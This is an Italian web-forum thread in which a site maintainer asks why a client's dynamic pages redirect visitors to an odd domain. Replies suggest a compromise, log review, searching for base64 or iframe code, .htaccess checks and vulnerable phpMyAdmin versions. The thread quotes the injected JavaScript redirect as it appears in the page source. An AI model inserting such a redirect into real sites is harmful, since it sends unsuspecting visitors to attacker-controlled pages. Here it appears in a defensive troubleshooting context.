Visualizzazione dei risultati da 1 a 10 su 10
  1. #1

    codice estraneo nelle pagine

    Ciao, ho un problema strano su un hosting di un cliente.
    Quando un utente accede alle pagine dinamiche del suo sito viene mandato in un sito strano (http://84f6a4eef61784b33e4acbd32c8fd...22a3c4880152d8) che non esiste, oppure si blocca la visualizzazione di una parte del sito stesso.

    Ho verificato e negli script non è presente nulla di strano, mentre a run-time, nel sorgente della pagina vedo questa stringa:


    codice:
    <script type='text/javascript'>document.location.href='http://84f6a4eef61784b33e4acbd32c8fdd72.com/'+Math.floor(Math.random()*10000);</script>
    Come risolvo?
    Perchè è lì?

    Ho fatto scansioni sul server e non ho trovato niente.
    è l'unico sito che ha questo problema anche se ce ne sono altri creati dalla stessa "mano".

    Grazie.
    Ciao
    www.evinformatica.it
    assistenza informatica pordenonese

  2. #2
    Utente di HTML.it L'avatar di bstefano79
    Registrato dal
    Feb 2004
    Messaggi
    2,520
    io credo sia opera di un qualche hacker/spammer

    controlla in tutti i file che contengono document.location.href finchè non trovi quello "infettato"

  3. #3
    ti hanno bucato il sito, devi esaminare il log per capire come hanno iniettato quel codice, quasi sicuramente hanno sfruttato una vulnerabilità in qualche script...

    controlla le date di ultima modifica dei file finché non trovi quello modificato, dopodiché esamina i log per capire come hanno fatto...
    « Se nella prima mezz'ora non capisci chi è il pollo, allora il pollo sei tu. » [Thomas "Amarillo Slim" Preston, campione del mondo di poker]

  4. #4
    ciao, quindi potrebbe bastare uploadare nuovamente tutto il codice?
    ciao
    www.evinformatica.it
    assistenza informatica pordenonese

  5. #5
    se hanno sfruttato una vulnerabilità e uploadi nuovamente tutto il codice lo rifaranno, devi prima trovare la falla...
    « Se nella prima mezz'ora non capisci chi è il pollo, allora il pollo sei tu. » [Thomas "Amarillo Slim" Preston, campione del mondo di poker]

  6. #6
    Utente di HTML.it L'avatar di bstefano79
    Registrato dal
    Feb 2004
    Messaggi
    2,520
    Originariamente inviato da verardoelvis
    ciao, quindi potrebbe bastare uploadare nuovamente tutto il codice?
    ciao
    come misura temporanea si, ma vedrai che prima o poi (speriamo poi) risuccederà

  7. #7
    ciao, purtroppo non mi funziona ancora.

    ho provato a ricaricare alcuni file ma non ho notato nessun miglioramento.
    e anche mettendo l'intera cartella del sito sotto un altro sito per prova non cambia niente.
    come se le pagine fossero realmente modificate ma dentro non c'è il codice che fa il redirect!!!!
    anche nelle pagine ricaricate (che in locale non hanno problemi).

    non sono più cosa fare.
    sto facendo scansioni ma ninete.

    cosa posso fare?

    ciao
    www.evinformatica.it
    assistenza informatica pordenonese

  8. #8
    Utente di HTML.it
    Registrato dal
    Jul 2010
    Messaggi
    719
    Puoi mettere il codice?
    Perchè io non ho altre soluzioni...

    Se ci dai pure il link della pagina dove hai il problema...

  9. #9
    Prova a cercare anche base64encode e simili, nonchè "iframe"...

  10. #10
    Utente di HTML.it L'avatar di brodik
    Registrato dal
    Jan 2009
    Messaggi
    765
    molto probabile che il codice in questione si trovi in un file .htaccess se sei su apache..

    P.S.: md5(84f6a4eef61784b33e4acbd32c8fdd72) = antivirus

    EDIT:

    hai PHPMyAdmin installato?

    molto probabile che sia colpa sua se hai installato una di queste versioni:
    2.11.x fino a 2.11.9.5
    3.x fino a 3.1.3.1

    exploit link
    eXvision

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved.